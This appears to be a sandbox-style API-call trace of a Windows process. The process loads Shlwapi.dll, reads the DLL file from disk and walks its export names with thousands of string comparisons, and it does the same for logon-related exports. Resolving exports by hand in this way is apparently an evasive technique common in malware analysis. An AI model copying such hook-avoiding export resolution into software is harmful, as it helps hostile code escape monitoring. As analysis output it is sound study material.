lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0094.834] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0094.835] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0094.836] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0094.837] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0094.837] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0094.838] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0095.036] GetProcessHeap () returned 0x570000 [0095.036] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x570000) returned 1 [0095.036] GetProcessHeap () returned 0x570000 [0095.036] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5891a0 [0095.036] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0095.036] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0095.036] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0095.036] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0095.036] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0095.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0095.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0095.037] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0095.037] GetProcessHeap () returned 0x570000 [0095.037] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x51148) returned 0x2db5030 [0095.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0095.037] ReadFile (in: hFile=0x17c, lpBuffer=0x2db5030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db5030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0095.039] CloseHandle (hObject=0x17c) returned 1 [0095.040] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0095.040] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0095.040] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0095.040] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0095.040] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0095.040] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0095.040] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0095.040] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0095.040] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0095.040] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0095.040] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0095.041] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0095.041] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0095.042] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0095.042] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0095.042] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0095.043] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0095.043] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0095.044] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0095.044] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0095.044] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0095.044] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0095.045] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 